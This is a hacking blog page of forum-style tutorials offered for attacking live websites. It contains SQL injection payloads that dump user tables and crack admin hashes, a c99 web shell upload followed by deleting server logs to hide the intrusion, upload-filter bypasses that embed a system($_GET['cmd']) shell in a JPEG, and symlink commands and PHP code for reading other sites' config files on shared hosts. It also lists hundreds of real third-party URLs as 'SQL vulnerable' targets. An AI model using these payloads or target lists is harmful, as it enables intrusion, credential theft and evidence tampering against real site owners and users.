\

Featured

Powered by Blogger.

Browsing "Older Posts"

Advanced SQL Injection Tutorial - Complete website Rooting by h4ck3r $p1d3r

This work has been in proud memorial to my haters, the social fake system and some of my best friends.

Note :-The credits goes to the following.


Credits for the Tutorial and the r00t :-

1337
4MY H4CK3R
CR CR4CK3R
MR. D00ZI3.
N30 H4CK3R

Well before I go through the tutorial, let me Introduce myself. I am a complete noob at Hacking, but I do hack and had hacked some good sites and I know the basics, not much, but i can rely on my basics, so before going thorough this tutorial what you will need are the following :-


1.) A Working Brain to understand the concept.
2.) A Computer that runs Windows [Linux is better]
3.) Patience


So, before Introducing my re-edited edition of what MY Friend and the contributers had already wrote, I make it more noob friendly for the members here hat Hackforums. I am NOT the original writer of this method, and take no responsibility with what you do with this thing, but I just should say you -> Always prepare yourself behind 3 proxies before getting your hands dirty on a legal server. The precautions that you can take are, be sure to use a proxy with SSH and use PUTTY or Tor, that suits you the most. I have also added images to make things more clear for the beginners. Remember , in hacking and exploring, you always have to get your hands dirty and keep exploring, so please be patience till the end of this thread as it will be a long procedure, in any way if you get distracted by the long method, you fail. So good luck on your Fascinating journey on r00ting servers.


- Computer Science.


Note on my THREAD -> It took me a lot of time to design this thread for the convenience of the users here at Hackforums, so please kindly add a reply to the thread to keep it alive as well as make me feel that the work I did was fruitful. I would appreciate that. Thanks.


The ORIGINAL content from Advance SQLi to r00ting starts here :)


What you will need are the following :


1. Mantra Security Toolkit - Download

2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6

3. Any PHP Shell you are comfortable with
- Google for "c99 shell" I recommend Devil shell from Team Nuts, Indian Hackers.

The Process.


I have a Website for you :)

Code:
http://192.168.132.128/

[Image: mantrahackbar1.jpg]

I went through all the pages of web site and found a page with URL input

Code:
http://192.168.132.128/?id=13

[Image: mantrahackbar2.jpg]

I launched Hackbar by pressing F9

[Image: mantrahackbar3.jpg]

The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.

Code:
http://192.168.132.128/?id=13'

[Image: mantrahackbar4.jpg]

Since the page content is different from the previous one. I can make sure that the web page is vulnerable. And might be you already know how a vulnerable webpage looks?
Lets find out the number of tables
So we will be using the ORDER+BY Command.

Code:
http://192.168.132.128/?id=13 order by 1

[Image: mantrahackbar6.jpg]

I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage.

Code:
http://192.168.132.128/?id=13 order by 7

[Image: mantrahackbar7.jpg]

I went up to 7 and no change till now

Code:
http://192.168.132.128/?id=13 order by 7

[Image: mantrahackbar12.jpg]

The ORDER+BY Injection at 8 changes the page, so I find a way to hack this webserver :P

Code:
http://192.168.132.128/?id=13 order by 8

[Image: mantrahackbar13.jpg]

Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT.

[Image: mantrahackbar14.jpg]

I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables.

[Image: mantrahackbar16.jpg]

Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2





Code:
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7

[Image: mantrahackbar19.jpg]

I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page, I don't have to explain these if you already know Basic SQLi tricks.

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7

[Image: mantrahackbar21.jpg]
The current user is cms_user@localhost
Lets find out the version of the database. I replaced 2 in the URL with version() command.

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7

[Image: mantrahackbar22.jpg]

5.0.45 is the version, so I think that will be an easy target. google more and research for version below this like for any other versions if you get or 4.0.x, Let me list all the tables

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables

[Image: mantrahackbar23.jpg]

From this list I found "user" is an interesting table, Now I listed all the columns and its a big list

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns

[Image: mantrahackbar24.jpg]

I want columns from the table "user" and nothing else

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'

[Image: mantrahackbar25.jpg]

Lets find the user name

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user
Now, what about password

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user

[Image: mantrahackbar26.jpg]

it is encrypted, ha ha Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com

[Image: mantrahackbar30.jpg]

Voila.!!! I got the password

[Image: mantrahackbar31.jpg]

Finding the log in page. Its was right in front of me, but on other cases you need to find it, i ain't go explain everything, you have to do a lot of research and that is how hackers do, and explorers and pirates explores

[Image: mantrahackbar32.jpg]

Logging in with the credentials I have, Greetings.!!! I'm an admin now. Look at my powers. Let me add an event.

[Image: mantrahackbar37.jpg]

and of course I want to upload a picture

[Image: mantrahackbar38.jpg]

Lets see it allows me to upload the shell or not

[Image: mantrahackbar39.jpg]

Now I'm pressing on "Add Event" button

[Image: mantrahackbar40.jpg]

Nice. Looks like it's got uploaded

[Image: mantrahackbar41.jpg]

Let's see where the shell got uploaded to

[Image: mantrahackbar42.jpg]

I'm trying to get the default upload location

[Image: mantrahackbar43.jpg]
[Image: mantrahackbar44.jpg]
Looks like I got it. Let me click on the c9shell.php file I just uploaded. Voila. I have shell access

[Image: mantrahackbar46.jpg]
I simply clicked on the up button to get the root folder

[Image: mantrahackbar48.jpg]
Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial.

What I'm interested is the log folder
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
Let me go back and edit the log file

[Image: mantrahackbar52.jpg]
[Image: mantrahackbar53.jpg]
I deleted complete log entries. Now saving it. Nice. Log file is empty now

[Image: mantrahackbar56.jpg]
Now. Lets remove the c99 shell by pressing on Self Remove, Confirmed.!!!, OK. Good Bye C99

[Image: mantrahackbar60.jpg]

Thanks to keep Patience, keep the THREAD alive by simply giving out a reply, a reply would justify my Hard work on this THREAD :)
[Image: coollogo_com-275048713.gif]
SQLi + R00ting, STEP by STEP each with Pictures, best in whole HF.
Tags:

Advanced SQLiTutorial - Complete website r00ting

By admin → Wednesday, January 22, 2014
Posted by admin at 4:56 PM 0 comments
Labels:


http://www.4ips.biz/products.php?id=7
http://www.absolutenorth.co.nz/news_display.php?id=155
http://www.solutionfocusedtrainers.co.uk/trainers.php?id=5
http://www.rockiurbanfitness.com.au/trainers.php?id=8
http://www.arcdi.com/trainers.php?id=30
http://www.youronesourcefitness.com/trainers.php?id=34
http://www.sealfit.com/trainers.php?id=5
http://www.cvc.nl/trainers.php?id=25
http://www.olympiclanden.be/info/trainers.php
http://www.door.nl/trainers.php?id=5
http://www.phpcalendarscripts.com/buy.php?option=2
http://www.phpjabbers.com/buy.php?script=6
http://www.computerandvideogames.com/article.php?id=175552
http://www.nlcnet.org/article.php?id=613
http://www.corpwatch.org/article.php?id=13646
http://www.michaelpollan.com/article.php?id=87
http://www.phpbuddy.com/article.php?id=8
http://www.computerandvideogames.com/article.php?id=203174
http://www.nlcnet.org/article.php?id=562
http://www.michaelpollan.com/article.php?id=80
http://www.soaw.org/article.php?id=205
http://www.unitedforpeace.org/article.php?id=2136
http://www.soaw.org/article.php?id=530
http://www.democracyjournal.org/article.php?ID=6570
http://www.soaw.org/article.php?id=98
http://www.unitedforpeace.org/article.php?id=2854
http://www.democracyjournal.org/article.php?ID=6527
http://www.colorlines.com/article.php?ID=309
http://www.plusline.org/article.php?id=4695
http://www.vcn.com/knowledgebase/article.php?id=422
http://www.all.org/article.php?id=11934
http://www.computerandvideogames.com/article.php?id=215066
http://www.forestethics.org/article.php?id=1176
http://www.onradio.gr/play_old.php?id=388
http://www.j-diocese.org/newsdetail.php?id=3386
http://www.acutech-consulting.com/newsdetail.php?id=61
http://www.wichitafallscommerce.com/newsDetail.php?id=57
http://www.j-diocese.org/newsdetail.php?id=34
http://www.tasouganda.org/newsdetail.php?id=33
http://www.samuseum.org/about/newsdetail.php?uid=34
http://www.maimonides.org/upper/newsDetail.php?id=170
http://www.nayapatrika.com/newsdetail.php?id=807070311492449&n_id=23
http://www.congreso.net/newsdetail.php?id=65
http://www.nayapatrika.com/newsdetail.php?id=807100601595356&n_id=32
http://www.mercurymarine.com/newsandevents/newsdetail.php?ID=30
http://www.leadacidbatteryinfo.org/newsdetail.php?id=44
http://www.mercurymarine.com/newsandevents/newsdetail.php?ID=25
http://www.leadacidbatteryinfo.org/newsdetail.php?id=42
http://www.dpu.org.tw/En/newsDetail.php?Mode=News&ID=2008&ArticleID=50
http://www.e-motionsoftware.com/about/newsdetail.php?ID=2
http://www.komjuniti.com/newsdetail.php?id=102
http://www.bioconceptlabs.com/popup.php?ref=/newsdetail.php?id=12
http://www.epp.eu/newsdetail.php?newsID=434&hoofdmenuID=4&submenuID=49&subsubmenuID=147
http://www.bioconceptlabs.com/popup.php?ref=/newsdetail.php?id=11
http://www.paknavywr.com/newsDetail.php?id=5
http://www.prater.at/NewsDetail.php?Id=1360218
http://www.simoco.net/telecom/newsdetail.php?type=news&id=11
http://www.centralinnovation.co.uk/news/newsdetail.php?nid=1638
http://www.hoefner.ch/newsdetail.php?id=19
http://www.jfdp.org/newsDetail.php?id=8
http://www.hebron.com/english/gallery.php?id=170
http://www.frcphotos.com/gallery.php?id=194
http://www.melbournefineart.com.au/gallery.php?id=20
http://www.cwfarchives.com/Gallery.php?id=12
http://www.jymop.com/gallery.php?id=1919&img=6
http://www.jonbidwell.com/gallery.php?id=jb488
http://www.studiocromie.org/gallery.php?id_art=56&id=216
http://www.egotvonline.com/gallery.php?id=5
http://www.jonbidwell.com/gallery.php?gallery=&id=jb659
http://www.fag1.cn/news/newsone.php?id=38
http://www.fag1.cn/news/newsone.php?id=60
http://www.bbly.clxcpu.cn/newsone.php?id=369&pid=100023
http://www.nskks.cn/news/newsone.php?id=272
http://www.buchakademie.de/sem/sem.php3?id=928
http://www.go-whippet.co.uk/announce.php?id=9
http://www.planetizen.com/mobile/announce.php?id=38824
http://www.planetizen.com/mobile/announce.php?id=38897
http://www.indeliblevision.com/announce.php?mode=view&id=17
http://www.afrii.org/announce.php?id=1
http://www.sisonlgu.gov.ph/announce.php?id=3
http://www.worstpreviews.com/review.php?id=1008
http://www.pixelsurgeon.com/reviews/review.php?id=687
http://www.eyemagazine.com/review.php?id=85&rid=447
http://www.d-kaz.com/reviews/review.php?id=384
http://www.theatreview.co.nz/reviews/review.php?id=2195
http://www.bloody-disgusting.com/review.php?id=561
http://www.pixelsurgeon.com/reviews/review.php?id=268
http://www.bgra.net/2004/review.php?id=501&type=head
http://www.allaboutjazz.com/php/review.php?id=11772
http://www.icehw.net/review.php?id=100
http://www.paranormalromance.org/reviews/review.php?id=29221
http://www.deepintense.com/review.php?id=231
http://www.theatreview.org.nz/reviews/review.php?id=1886
http://www.geilunleashed.com/review.php?id=2
http://www.churchrater.com/review.php?id=257
http://www.chimpomatic.com/reviews/review.php?id=223
http://www.andygrace.com/viewphoto.php?id=41
http://www.chrisroyce.co.uk/album/viewPhoto.php?id=506
http://www.raypang.com/new/cryfield/viewphoto.php?id=208
http://www.evai.de/viewphoto.php?org=area&id=238
http://www.flugsimulatorbilder.de/viewphoto.php?id=28532
http://www.ddc.moph.go.th/showimg.php?id=128
http://www.puutera.com/showimg.php?id=5
http://www.stephensbuilder.com/showimg.php?id=8
http://www.medpharma-ae.com/showimg.php?id=160
http://www.ddc.moph.go.th/showimg.php?id=351
http://www.8op10.be/showimg.php?id=117
http://www.plumeriaexoticdesign.com.au/showImg.php?id=71
http://www.8op10.be/showimg.php?id=68
http://www.motor-europe.com/newscat.php?id=4
http://www.eanm.org/education/edu_facility/ther_dos/curriculum.php?navId=33
http://www.massbioed.org/educators/curriculum.php?page_function=detail&curriculum_id=9
http://www.girlsprep.org/LowerEastside/curriculum.php?id=9
http://www.mansci.uwaterloo.ca/undergrad/program/curriculum.php?id=4
http://www.a.com.mx/curriculum.php?id=25
http://www.salon52.ca/academies/curriculum.php?id=174
http://www.ducatindia.com/curriculum/curriculum.php?id=42
http://www.a.com.mx/curriculum.php?id=4
http://www.accompositors.com/compositores-curriculum.php?idComp=158
http://www.entijuanarte.com/curriculum.php?id=153
http://www.yepp-online.net/curriculum.php?id=46
http://www.yepp-eu.org/curriculum.php?id=56
http://www.americanschoolfes.com/curriculum.php?id=2
http://www.mete.gov.al/galeri_info.php?l=a&p=44&ida=2
http://www.nikollelesi.org/galeri_info.php?l=a&ida=9
http://www.lezha.org/galeri_info.php?lang=AL&idr=309&ida=19
http://www.vanhuberta.co.id/material.php?cat=6
http://www.gkasparov.com/material.php?id=4619D15348175
http://www.fudim.org/seroportunidad/libreria/material.php?id=86
http://www.betanien.de/verlag/material/material.php?id=128
http://www.gbritain.net/humor.php?id=2
http://www.vestibularseriado.com.br/humor.php?id=1
http://www.blogdopastor.com.br/humor.php?subaction=showcomments&id=1185486996
http://www.cartagomola.com/humor.php?id=1
http://www.kupa.pl/pl/humor.php?id=16
http://www.radios.no/humor.php?kategori=2&view=true&id=522
http://www.blamm.com/top10.php?id=28
http://www.barlebao.com/top10.php?id=341
http://www.agroexchange.de/xchange/top10.php?id=1
http://www.esfhm.com/braguetazos/top10.php?id=3
http://www.poblanerias.com/clasificados/clasificados-top10.php?cat=2
http://www.adwelo.de/exchange/top10.php?id=1
http://www.jcquizas.nl/leden.php?id=3
http://www.okea.nl/leden.php?id=91
http://www.vnf-nijmegen.nl/leden.php?id=58
http://www.okea.nl/leden.php?id=64
http://www.businesscluboranjezwart.nl/leden.php?id=47
http://www.mijnsprinters.com/leden/leden.php?id=21
http://www.stchristoffel.nl/leden.php
http://www.businesscluboranjezwart.nl/leden.php?id=24
http://www.fov.nl/content/leden.php?id=102
http://www.uitslaopers.nl/leden.php?id=1
http://www.punch-basketball.nl/leden.php?state=view&id=607
http://www.ovbrm.nl/leden.php?l=leden&id=0015
http://www.vwbusclub.be/leden.php?currentpage=leden&id=10
http://www.talskerwoelfe.de/mitglieder.php?id=12
http://www.vwgoe.at/mitglieder.php?id=201
http://www.dreizunull.net/manager/mitglieder.php?id=103
http://www.bogensport.li/bsv/mitglieder.php?st=3&id=6
http://www.versicherungsverband.li/mitglieder.php?id=5
http://www.fotoclub-dresden.de/mitglieder.php?id=46
http://www.azijnfabriek.nl/nieuws.php?id=137
http://www.nedap.com/nieuws.php?id=30
http://www.somnio.nl/nieuws.php?id=1
http://www.orientatie.org/nieuws.php?id=141
http://www.ampco.be/_nl/nieuws.php?id=14
http://www.comicbase.nl/nieuws.php?ID=574
http://www.friespopnet.nl/nieuws.php?id=844
http://www.iksbv.nl/nieuws.php?ID=18
http://www.zandvoortinbeeld.nl/nieuws.php?id=688
http://www.tijlbeckand.nl/site/nieuws.php?id=61670
http://www.toppigeons.nl/nieuws.php?id=4210
http://www.labyrinthonderzoek.nl/nieuws.php?id=189
http://www.schaatspeloton.nl/nieuws/nieuws.php?id=1128
http://www.willemvdwal.nl/beelden.php?id=7
http://www.liesbettol.nl/galerij.php?id=3
http://www.bwakielce.wici.info/galerie.php?id=4
http://www.irishcob.cz/galerie.php?id=16
http://www.pixheaven.net/galerie.php?id=18
http://www.wiese-immobilien.com/galerie.php?mode=immo_bild&id=37
http://www.labush.com/v4/galerie.php?type=&id=&nb=1
http://www.komiks.cz/galerie.php?action=galerie&id=187
http://www.bbcc.ch/galerie.php?id=15
http://www.ccsh.cz/galerie.php?id=61
http://www.cssd-jicin.cz/galerie.php?id=49
http://www.glamorescort.com/galerie.php?id=178
http://www.isabelle-faucher.com/galerie.php?id=10
http://www.paves-reseau.be/membres.php?p=1&id=1
http://www.aicim.be/main/fr/membres.php?provider=MWA&offset=90
http://www.paves-reseau.be/membres.php?p=1&id=8
http://www.rez-gif.supelec.fr/~sono/membres.php?id=2004
http://www.kiwanisalma.qc.ca/pages/membres.php?id=14
http://www.asp-php.net/tutorial/asp-php/dmx-membres.php?page=2
http://www.ucq-amiens.org/comites/membres.php?id=27
http://www.groupeart.com/membres.php?id=53
http://www.opw.be/membres.php?id=ro6&tid=2&docid=224
http://www.cdpcdc.fr/Membres.php?id=48
http://www.tipsportarena.cz/multifunkcni-areal/hotel.php?lang=en&id=4
https://www.azores.com/reservations/hotel.php?id=4
http://www.sistemalagodicomo.it/hotel.php?id=4
http://www.zeegarden.com/hotel.php?id=4
http://www.solvera.la/hotel.php?id=4
http://www.skifrance.cz/tignes-hotel.php?id=4
http://www.hotelandmore.it/hotel.php/id=4
http://www.info-alberghi.com/hotel.php?id=4
http://www.varazze.com/hotel/hotel.php?id=4
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=4
http://www.info-alberghi.com/hotel.php?id=12
http://www.manos-travel.hu/hotel.php?id=12
http://www.barcatours.sk/hotel.php?id=12
http://www.ogar.cz/2007/hotel.php?stred=aktuality_det&id=12
http://www.olomouc.com/ubytovani/hotel.php?id=12
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=12
http://www.guesthotels.eu/hotel.php?id=12
http://www.aiatour.com/hotel.php?id=5&stars=3
https://www.azores.com/reservations/hotel.php?id=5
http://www.tossahoteles.com/hotel.php?id=5
http://www.sanpancrazioviaggi.it/front/it/hotel.php?id=5
http://www.dreamtravel.bg/hotel.php?id=5
http://www.varazze.com/hotel/hotel.php?id=5
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=5
http://www.bountyclub.dk/hotel.php?id=5
http://www.conference-halls.com/hotel.php?id=6
http://www.nextholidaysrilanka.com/hotel.php?id=6
http://www.teztour.bg/hotel.php?id=6
http://www.manos-travel.hu/hotel.php?id=6
http://www.rexhotels.it/ita/hotel.php?id=6
http://www.sistemalagodicomo.it/hotel.php?id=6
http://www.sanpancrazioviaggi.it/front/it/hotel.php?id=6
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=6
http://www.gamatours-mg.com/hotel.php?page=1&id=6
http://www.corpotour.ru/hotel.php?id=6
http://www.aiatour.com/hotel.php?id=7&stars=3
http://www.conference-halls.com/hotel.php?id=7
http://www.sunoceanmaldives.com/resorts-hotel.php?id=7
http://www.tossahoteles.com/hotel.php?id=7
http://www.manos-travel.hu/hotel.php?id=7
http://www.info-alberghi.com/hotel.php?id=7
http://www.teztour.bg/hotel.php?id=7
http://www.info-alberghi.com/fr/hotel.php?id=7
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=7
http://www.sistemalagodicomo.it/hotel.php?id=7
http://www.swts.ru/hotels/hotel.php?id=7
http://www.condorferries.fr/GLOBAL/pages/week-end_et_sejours/hotel.php?id=7
http://www.apps2009.com/images.php?id=2
http://www.xtraflex.nl/ht2/images.php?imggroep=gr1&ID=2&taal=du&ID=4
http://www.onf-nfb.gc.ca/fra/collection/film/galerie-images.php?id=2
http://www.connexion.fm/images.php?lang=fr&id=2
http://www.tu-sofia.bg/Bul/faculties/mtf/tmmm/consortium/templates/images.php?LNG=bg&id=2
http://www.suteatar.org/images.php?id=2
http://www.sokit.cz/images.php?id=3&img=4
http://www.990000.com/images.php?id=3
http://www.millerkittredge.com/pictures/elwood/images.php?id=3
http://www.seeb.net.pl/portfolio/images.php?id=3
http://www.suteatar.org/images.php?id=3
http://www.nexxrattan.hu/images.php?id=3
http://www.tu-sofia.bg/Bul/faculties/mtf/tmmm/consortium/templates/images.php?LNG=bg&id=3
http://www.fleuraugustinus.nl/images.php?id=3
http://www.oobgolf.com/golfers/images.php?id=4
http://www.990000.com/images.php?id=4
http://www.granitestatemillworks.com/files/images.php?ID=4
http://www.guilhermedesigner.net/images.php?id=4
http://www.xtraflex.nl/ht2/images.php?imggroep=gr1&ID=2&taal=du&ID=4
http://www.onf-nfb.gc.ca/fra/collection/film/galerie-images.php?id=4
http://www.nexxrattan.hu/images.php?id=4
http://www.990000.com/images.php?id=5
http://www.ms-hariri.com/images.php?id=5
http://www.bedandbreakfast-gent.be/_en/images.php?id=5
http://www.humourjuif.com/images/images.php?id=5
http://www.nexxrattan.hu/images.php?id=5
http://www.ewno.com/images.php?category=7
http://www.safe.org.nz/images.php?oid=6520
http://www.zabeelinvestments.com/images.php?cat=3
http://www.candycreations.net/images.php?cat=11&page=3
http://www.communipix.com/images.php
http://www.madjokes.co.uk/?page=images.php
http://www.candycreations.net/images.php?cat=17
http://www.brendamurphy.com/images.php?cat=8
http://www.plantdetectives.com/images.php?cat=8
http://www.camp4.com/photos/images.php?user=Unitao
http://www.perspective2013.info/images.php?cat=2
http://www.onf-nfb.gc.ca/eng/collection/film/galerie-images.php?id=16531
    Tags:

    Some SQL Vunrable Website

    By admin →
    Posted by admin at 4:45 PM 0 comments
    Labels: ,

    This is the tutorial on uploading shell by bypassing the upload image script!!

    So someone you want to pwn has got a nice little option on there website to upload a image. Instead were going to try to upload some php code so we can eventually own the box.

    The following are ways to do this

    Firstly Just try to upload the shell if this doesn't work add add GIF89a; to the top of your shell.php example:
    GIF89a;

    Depending on what kind of file validation they are using this may fool the Server Into thinking its a image since when it reads the file it finds the GIF header and assumes its safe since its a Image.


    The next way is to rename your shell to shell.php.jpg and trying to upload. This works because the is a null byte and the server should drop it and anything after it but when you upload, it reads it as a .jpg and not a .php.

    Another way you can fool the web server into thinking your uploading a image instead of a php shell is to get Firefox and install the tamperdata Add on then click start tamper and upload your php shell then tamper the data and change the content-Type from 'application/octet-stream' to 'image/jpeg'.
    ^ self explanatory.

    The Final way im going to discuss is somewhat good.

    Find yourself a copy of edjpgcom.exe
    "edjpgcom is a free Windows application that allows you to change (or
    add) a JPEG comment in a JPEG file."
    Usage:
    --
    edjpgcom "filename.jpg"
    Now add this to the jpg comment since you wont be able to drop a whole shell in there due to limits etc.
    ";
    system($_GET['cmd']);
    echo "
    ";
    ?>
    now rename your jpg to .php and upload.
    This works since the jpeg and all its attributes are still intact and it seems like a normal jpg to the server.

    You can try and combine these techniques
    Tags:

    how to upload shell

    By admin →
    Posted by admin at 4:40 PM 0 comments
    Labels:
    How to symlink ? (TUTORIAL)

    Written by -h4ck3r $p1d3r- for begginer webhackers.

    NOTE : I do not take any responsibility for your actions. This was written for educational purposes only ! Also sorry for my bad english!

    Hello Hackers.
    Today i'll try to help begginer webhackers by teaching them a method called symlink.

    What is symlink ?
    Symlink is a method used by hackers to read files from other users on a linux server, only by using a php-shell.

    So what do we require to start the tutorial :

    Requirements :

    - a phpshell uploaded in a linux server (Safe MODE = OFF )
    - a target site
    - basic phpshell & linux knowledge
    - a brain !

    Let's start by the tutorial.

    Where to get a target, if you only have a phpshell uploaded in a linux server that has some sites ?
    It's easy , first get the IP of the server.
    Then go to bing.com and search like that :
    Code:

    ip:xx.xxx.xxx.xxx vbulletin

    xxx replace with the ip adress of the server , and 'vbulletin', you can change to a name of a forum software or a CMS you wish as a target. But for this example i'll take vBulletin.

    OK , now we got the target site , let's suppose that its domain name is mytarget.com and it uses vBulletin forum software.

    Now starts the real hacking !

    Go to your phpshell , and in the 'Execute command' field , execute there that command :
    Code:

    ls -la /etc/valiases/mytarget.com
    By executing this command , i'll get the name of the user (on the linux server) that keeps the website mytarget.com.
    It should return with a result similar to that :

    >>>>>>>-rw-r--r-- 1 target mail 28 May 28 2011 /etc/valiases/mytarget.com

    The red colored piece is the user of mytarget.com on the server.
    So in our case the username is 'target'

    Many of us know that the configuration file of vBulletin script ,can be found in /includes/config.php.
    This is the file we need to read in our case , in order to get access at our target site.
    How can we read that file ?
    Simple , execute that command on the shell :
    Code:

    ln -s /home/target/public_html/includes/config.php symlink.txt
    As you can see, we're writting the content of config.php , into symlink.txt file.
    After you execute the command , you will se a new file called symlink.txt.
    Open it and w00t !! You successfully read the configuration file (symlinked).
    Now , just get an MySQL connector script coded in PHP , and login with the details you get from configuration file of your target.Then at the admin table, get the admin's hash and crack it , or better , change the admin's email you yours , and then do a forgot password at mytarget.com
    And then you successfully will get full access in your target site !

    That was all ,very easy if you practice many times. Maybe soon i will make a video tutorial if you still didn't understand , just request the video tut in the comments , and i will try ASAP to make it for you !

    Thanks for reading , -ThatGuy- !
    Tags:

    How to symlink on a linux server

    By admin →
    Posted by admin at 4:34 PM 0 comments
    Labels:


    First of all we use Symlink function to make a shortcut for any file or folder we want

    that's why this function will be very useful for us to read any folder or file we want(For More Info Use Google).

    Here We are using the Shell Named "c99" to execute the small code of php(Eval Code) on the shared hosting server.

    The Exploit is used to download the slave's database If and only if the slave is in a shared host


    Download the below Shell & Follow the steps.

    ================================================== ==============
    Get Any C99 Shell
    ================================================== ==============

    /Step 1 $ Upload the php i.e Shell_Silic0n.php

    Shell on your root path. That is /home/hackerz/public_html .

    /Step 2 $ Open the uploaded file . The path will look like

    ================================================== ==============================​==
    http://www.yoursitename.com/shell_Silic0n.php
    ================================================== ==============================​==


    /Step 3 $ Next Step is read carefully the below php Eval Code . it's about 10 lines of php code.


    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!​!!!

    $filepath='/home/xx/public_html/xx.xx';
    $sitepath='/home/xx/public_html/';
    $writeblefilepath='myfile.txt';$flib=$sitepath.$wr iteblefilepath;
    @unlink($flib);
    symlink($filepath, $flib);
    echo readlink($flib) . "\n";
    ".file_get_contents("http://" .  $_SERVER['HTTP_HOST'] . "/" . $writeblefilepath)."</tex" .  "tarea>";<br />@unlink($flib);<br /><br />!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!​!!!!<br /><br />/Step 4 $ You should replace (xx) in the code in the upper two lines.<br /><br />In the 1st xx in the line one, means the target username.<br /><br />In the 2nd xx.xx in the line one, means the target file full path in other word it's<br /><br />usually used to read database configuration files to to steel it's connection information.<br /><br />xx in the line two, means your username. "For Eg :- /home/Your_Ass/public_html/configuration.php"<br /><br />$writeblefilepath, to enter any writable path on your site & also it is used fo to do the link process,<br /><br />and write the output.For @unlink you can search for them on php.net </span>
    echo "
    Tags:

    Private Symlink(PHP)

    By admin →
    Posted by admin at 4:23 PM 0 comments
    Labels:
    Subscribe to: Posts ( Atom )